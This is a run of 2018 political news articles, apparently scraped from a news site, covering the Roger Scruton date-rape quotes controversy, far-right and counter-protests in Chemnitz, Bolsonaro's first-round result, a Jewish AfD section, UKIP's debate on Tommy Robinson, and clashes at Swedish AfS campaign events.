Calls to sack philosopher Sir Roger Scruton, from an unpaid government role, have grown after quotes stating there was “no such crime” as date rape were attributed to him. Buzzfeed News unearthed that in a 2005 lecture, Scruton dismissed both date rape and sexual harassment, saying the latter was just “impoliteness,” claiming that there was a “huge injustice” against those accused. READ MORE: Moneybags Blair claimed £1m in British taxpayers’ money over last decade During the lecture, titled: ‘Sexual Morality for Heathens,’ at Rice University in Houston, Texas, the philosopher said that women who made date rape allegations were withdrawing consent retrospectively, because “the whole thing went too quickly.” On Saturday, Housing secretary James Brokenshire announced that Scruton was appointed on the government’s new buildings commission. Roger Scruton reckons Islamophobia and homophobia are "invented" and conservatives suffer from the "only 'phobia' permitted". Excuse me while I fetch my tiny violin. Why have the Tories appointed him an adviser months after they promised to "stamp out" Islamophobia? https://t.co/LK6yCJWff3 — David Lammy (@DavidLammy) November 6, 2018 After the latest revelations, Labour’s shadow minister for the Cabinet Office, Jon Trickett, joined in the calls for action, saying: “Theresa May must step in and sack him.” Absolutely vile: Roger Scruton claims there’s “no such thing” as date rape or sexual harassment – only “advances made by the unattractive”. Completely beyond the pale: boot him out. https://t.co/QEq10z8mnc — Dawn Foster (@DawnHFoster) November 7, 2018 Roger Scruton utterly unfit & unsuited to be a government housing adviser — Andrew Adonis (@Andrew_Adonis) November 8, 2018 Downing Street has remained tight lipped on the story, leaving Scruton himself and prominent conservative figures to defend him. Scruton released a statement attacking the “highly selective quotes,” adding that he was “in no way suggesting that victims of date rape are not victims of a crime.” Getting defended by Toby Young on the Today Programme is like getting the board’s dreaded vote of confidence on Football Manager. The sign of an imminent sacking — Matt Zarb-Cousin (@mattzarb) November 8, 2018 Fellow right winger Toby Young, who also was forced to resign from a similar role over various offensive comments, leapt to his defense. Appearing on BBC’s Radio 4’s Today Programme, Young stating that Scruton should not be ‘excluded from public life’ because his views don’t align with the “prevailing progressive orthodoxy.” Scruton was also supported by historians Niall Ferguson and Anne Applebaum, as well as journalist Tim Stanley. If Roger Scruton is barred from the public sphere, then it will hardly be worth engaging with. — Tim Stanley (@timothy_stanley) November 6, 2018 Roger Scruton has long been one of the most interesting thinkers in Britain, bravely thinking through problems others won't touch. https://t.co/RAq8HwKlgW — Anne Applebaum (@anneapplebaum) November 8, 2018 His quotes on date rape will heap pressure on Scruton who was already facing calls to be sacked over accusations of anti-semitism linked to comments he made about financier George Soros. In a 2014 lecture, Scruton stated: “Many of the Budapest intelligentsia are Jewish, and form part of the extensive networks around the Soros empire.” As well as anti-semitism, Scruton has also faced accusations of homophobia – stating it as “not normal” – and saying Islamophobia is “invented.” READ MORE: ‘Islamophobia allegations politically motivated’: Tory vice-chair slammed for remarks Scruton has known far-right Hungarian Prime Minister Viktor Orban for decades. The philosopher has expressed both criticism and support for Orban over various policies. His Tory employers have also supported Orban – despite accusations of anti-semitism over his attacks on Soros – ordering them to vote against censuring the country over breaching the ‘EU’s democratic values.’ Scruton’s troubles reflect those of Young, who’s Twitter account was expunged of thousands of tweets when he was hired as a government advisor. The missing Tweets didn’t help the Spectator columnist as journalists dug about many more of his quotes they deemed sexist, racist, homophobic, among other offenses, driving him from the position. Thousands have rallied in Berlin against the riding wave of right-wing politics. The protests come in the wake of recent far-right and neo-Nazi demonstrations against multiculturalism in Chemnitz, Köthen, and Schönberg.
Groups including, pro-refugee, LGBTIQ+ groups, and Muslim organizations hit the streets in support of Saturday’s ‘Indivisible’ protest against the growing surge of racism and xenophobia in Germany and across the EU.
The march pushed the slogan “solidarity instead of exclusion – for an open and free society” following nearly a month of tensions boiling over into right-wing rallies and left-wing counter protests, that at times descended into violence.
“A dramatic political shift is taking place: racism and discrimination are becoming socially acceptable,” organizers of ‘Indivisible’ (Unteilbar) said in a statement. “What yesterday was considered unthinkable and unutterable has today become a reality.”
The ‘unthinkable’ organizers may have been referring to were anti-migrant protests at Chemnitz, Köthen, and Schönberg.
Tensions reached fever pitch in Germany after the death of a German man in Chemnitz who was reportedly stabbed by a Syrian and an Iraqi. Multiple xenophobic protests took place, with the largest seeing 6,000 neo-nazis and far-right supporters gather to rally against Germany’s multiculturalism and migrant culture.

Some 1,500 left-wing counter-protesters answered back, with protests tipping over into violence as fireworks and projectiles were hurled at each other. Police used water cannons to keep the near-rioting crowds under control.
A fortnight later, on September 9, another right-wing demonstration took place in Köthen, sparked by the death of another German man who was killed in a fight with two Afghans. Authorities worked to stop tempers flaring following the chaos of Chemnitz.
Even children are not exempt from the surge in negative sentiments towards migrants. The neo-nazis were out in force in the northeastern town of Schönberg after a nine-year-old Syrian boy was killed in a road accident. Right-wing extremists have twice painted swastikas on the sidewalk, seemingly in celebration of the boy’s death.
Ethnic tensions in Germany have done damage to Angela Merkel’s government, appearing when Germany’s domestic intelligence chief Hans-Georg Maaßen was forced to step down after he questioned the authenticity of video footage showing far-right protesters in Chemnitz chasing down migrants. Maaßen also appeared to downplay the violence, sparking further controversy.
The removal of Maaßen, the head of the Federal Office for the Protection of the Constitution, came after more than a week of political clashes that revealed deep fissures in Angela Merkel’s coalition.

Brazilian right-wing candidate Jair Bolsonaro will head to the second round of the country’s election, facing leftist candidate Fernando Haddad on October 28, after narrowly failing to secure fifty percent of first round votes.
Bolsonaro is leading the polls in the first round of the presidential election, with 47 percent of the vote and 92.5 percent of the votes counted. The Congressman will head toward a second-round runoff against Haddad, the former Mayor of São Paulo, who so far has gained 27.9 percent of the popular support.

The 63-year-old conservative candidate, who had advocated a brutal crackdown on crime and graft ahead of the election, is well ahead of his Workers Party rival, whose former leader President Luiz Inacio Lula de Silva was barred from running due to his 12-year jail sentence on corruption charges.
It's hard to overstate how wildly and radically inaccurate all polling data was in Brazil – the most reliable polls off by 20 or more points consistently, across the country. A huge far-right wave magnitudes beyond what all polls predicted.

The 2018 election is seen as the most polarized vote in the country since the end of military rule in 1985. Bolsonaro, who appears to favor dictatorship, has an active support from a group of retired generals who stand opposed to the 2003-2016 rule of the Workers Party. The Congressman publicly advocates military intervention as a way to fight corruption.

The group of Jews within the AfD is aiming to hold its inaugural meeting in the German city of Offenbach on October 7, the Frankfurter Allgemeine Zeitung reported, citing a letter written to the paper.
The Jewish group will be an addition to the already existing Christian section of the AfD – the leader of which maintains that despite widespread claims, the party is not anti-Semitic.
“That doesn’t apply at all to what we are. The AfD is not an anti-Semitic party; we do not tolerate any anti-Semitism in the party. If that arises, if we notice it, then these people are thrown out,” Joachim Kuhs said, according to Deutsche Welle.
Still, the report seems to be a rare instance of “AfD” and “Jews” not appearing as two opposing sides in the media, which have often accused the party of having neo-Nazi links, harboring anti-Semitic views, and downplaying the horrors of the Holocaust. In June, AfD co-leader Alexander Gauland referred to the Nazi era as a “speck of bird s**t in over 1,000 years of successful German history.” Just last month, a local AfD leader came under fire after referring to man who tried to assassinate Adolf Hitler as a “coward” and a “traitor.”
Dimitri Schulz, a founding member of the planned Jewish AfD section, agrees with Kuhs, telling DPA news agency that the AfD “is the only party in Germany that makes anti-Semitism by Muslims a topic without trivializing it.”
Not everyone is convinced, however – including many Jews in Germany who can’t quite wrap their heads around why anyone from their faith would associate themselves with the AfD.
Among those angered by the news are members of the Jewish Students Union of Germany, one of whom told AFP that the party is “one of the biggest threats to Jewish… life in Germany.”
“The AfD is not getting a kosher certificate from us,” said the leader of the group, Dalia Grinfeld, who said her group is urging all Jews in Germany to join a protest in Offenbach to rally against the creation of the AfD’s Jewish section.
The row comes amid a rise in anti-Semitic crimes in Germany, with police data showing that such attacks rose by 10.7 percent in the first half of 2018, compared to the same period last year.

Facebook yesterday gave a “false rating” to an article written by a liberal news site after a conservative publication used by Facebook as a fact checker claimed the article was incorrect.
The article in question, published by ThinkProgress, was titled, “Brett Kavanaugh said he would kill Roe v. Wade last week and almost no one noticed.” While Supreme Court nominee Kavanaugh didn’t literally say that he would vote to overturn the abortion ruling from 1973, ThinkProgress writer Ian Millhiser made a reasonable argument that Judge Kavanaugh’s statements show that he believes Roe v. Wade was decided incorrectly.
The right-wing Weekly Standard called ThinkProgress’s article false in a fact check, based on the rather obvious fact that Kavanaugh never specifically said he would vote to overturn Roe.

The United Kingdom Independence Party (UKIP) will allow a debate to be held on whether the controversial right-wing activist Tommy Robinson will be allowed to join the party.
“UKIP Party Chairman Tony McIntryre has come to a decision on allowing a debate at the party conference on whether Tommy Robinson should be allowed to join UKIP,” the party tweeted on Sunday. The debate will take place at the party conference in Birmingham on September 22.
Prior to the announcement, Robinson posted a video on Facebook in which he said that UKIP has the opportunity to “electrify” the UK’s working class by allowing him to join, stating that his membership could lead to a “political revolution” in Britain.
Robinson went on to state that the left-wing media are “terrified” of him joining UKIP. “They know the support we have, they know the support I have across this country, they know the way the public are feeling, and they want to do everything they can to stop it.”
The video was the first to be published by Robinson since being released from prison. That release occurred following a successful appeal by Robinson, after it was ruled that the process leading to his contempt of court conviction was “flawed.”
Robinson, whose real name is Stephen Christopher Yaxley-Lennon, is known for his outspoken right-wing views, particularly regarding immigration and Islam. His recent release from jail sent Twitter into a frenzy, while clashes between his supporters and anti-fascists led to a police officer being hospitalized in July.

Eleven people have been taken to hospital in the wake of a right-wing demonstration and an anti-fascist counter-protest in the eastern German city of Chemnitz, where a fatal stabbing sparked a wave of rallies.
Tensions were running high in Chemnitz with sporadic clashes being reported between the participants of two rival marches that took place in the city on Saturday under heavy police presence.
A total of some 9,500 people took part in both demonstrations, police reported. The turnout of the right-wing rally, led by anti-immigrant AfD (Alternative for Germany), anti-Islam PEGIDA and right-wing group “For Chemnitz,” which joined later in the day despite police objections, outnumbered the one organized by left-wing activists, which marched under the motto “Heart against Hatred” and attracted some some 4,000 people, according to the count provided by the city authorities.
The right-wing demonstration, initially envisaged as a “silent march,” gathered at the Karl Marx monument in downtown Chemnitz chanting “Wir sind das Volk” (We are the people) and other slogans.
Disturbances were reported at the nearby 12th century landmark Roter Turm (Red Tower). According to police, several groups of people tried to break through police cordons and infiltrate the right-wing rally there. Some 300 people were arrested as police moved to prevent the skirmishes, it said in the report.
Eleven people were hospitalized following the violence, the city authorities reported.
Overall, 25 offences of various nature, such as damage to property, inflicting injuries, resisting police and using banned insignia, have been reported by police. In an incident that took place outside demonstration venues, a 20-year-old Afghan man was attacked and beaten by four unknown perpetrators. The victim suffered minor injuries.
The counter-demonstration was supported by Germany’s mainstream parties, including Angela Merkel’s Christian Democratic Union (CDU), the Social Democrats (SPD), the Greens and the Left Party. As SPD MP Soren Bartol and his entourage were on their way to leave the rally, they were attacked by what Bartol described on Twitter as Nazis. The lawmaker said that attackers destroyed the party’s flags and inflicted bodily harm on some of his associates. None of the injuries were serious, however.
Ich bin entsetzt. Meine Gruppe aus Marburg wurde gerade auf dem Weg zum Bus von Nazis überfallen. Alle SPD Fahnen zerstört und einige wurden sogar körperlich angegriffen. #chemnitz#spd#marburg

The rallies in Chemnitz have been going on for days, sparked by the death of a 35-year-old German in a brawl on Saturday, which reportedly involved around 10 people of “various nationalities.” A 22-year-old Iraqi and a 23-year-old Syrian were subsequently arrested and charged with manslaughter.

It should have been an ordinary campaign meeting, which every party in Sweden holds ahead of the elections. But things went wrong for AfS in the city of Uddavalla, where the party, known for its hard-line anti-immigrant rhetoric, decided to make a stop.
A group of AfS members, including parliamentary candidate Markus Jonsson, was met by an angry crowd of young people, who were shouting, chanting slogans and holding placards that read: “Crush racism!”
As the AfS members started presenting their program, things quickly boiled out of control. The crowd of people, many apparently of immigrant background, started throwing eggs at the party members. At some point someone from the mob assaulted Jonsson and struck him to the groundDelete
An RT crew present at the scene filmed the incident. The AfS members had to immediately leave the place while police detained the attacker, apparently provoking further outrage. The video shows another young man engaging in a heated debate with a police officer in an apparent attempt to make the police release the suspect. Police told the Swedish media later that two persons were detained in connection with the incident.
“I tried to protect my friend and colleague and that immigrant started hitting both of us in the face,” Jonsson later told RT, explaining that the assailant first attacked another party member, prompting the parliamentary candidate to intervene. He went on to say that the crowd chased a car belonging to AfS for some time. “When we stopped at the red light, they kicked the car,” he added.
The locals explained that they did not want to see “racists on our streets” and were extremely “unhappy” about the AfS agenda, which involves “taking down all immigrants.” “Many immigrants here feel like they are not included in society,” one of the protesters told RT.
In a separate incident, two young men attempted to pelt the leader of another right-wing party, the Sweden Democrats, Jimmie Akesson, with eggs and tomatoes during his own campaign stop in the city of Falkenberg. However, they were promptly stopped by the police. The incident led to a scuffle.
“One person was arrested for violence against a public official,” Western Police District spokesman Stefan Gustafsson said. Akesson himself took the incident lightly as he said that “someone was so kind to give him a tomato” and it “tasted good.”
The AfS is an upstart party formed just about a year ago by members of the youth wing of the Sweden Democrats after they were collectively expelled. The AfS then took an even more extreme stance on immigration and suggested repatriating a significant number of immigrants from Sweden to their countries of origin, as well as closing the borders.
AfS leader Gustav Kasselstrand once said that he took inspiration from Europe’s other right-wing anti-immigrant parties, such as Alternative for Germany, which apparently influenced the name choice, as well as Austria’s Freedom Party (FPO) and France’s National Rally (formerly National Front).
Tensions are high in Sweden ahead of the general election, which is scheduled to take place in ten days. Sweden’s biggest and oldest Social Democratic Party is set to get one of its worst results in history while the nationalist Sweden Democrats enjoy record support and might well end up second.
Sweden is far from the only country where right-wing sentiment is surging on the back of unwelcome immigration. This week, Germany saw a wave of protests in the city of Chemnitz following the murder of a German man, allegedly committed by two asylum seekers. Clashes between right-wing protesters and leftists left some 20 people injured, according to the police.
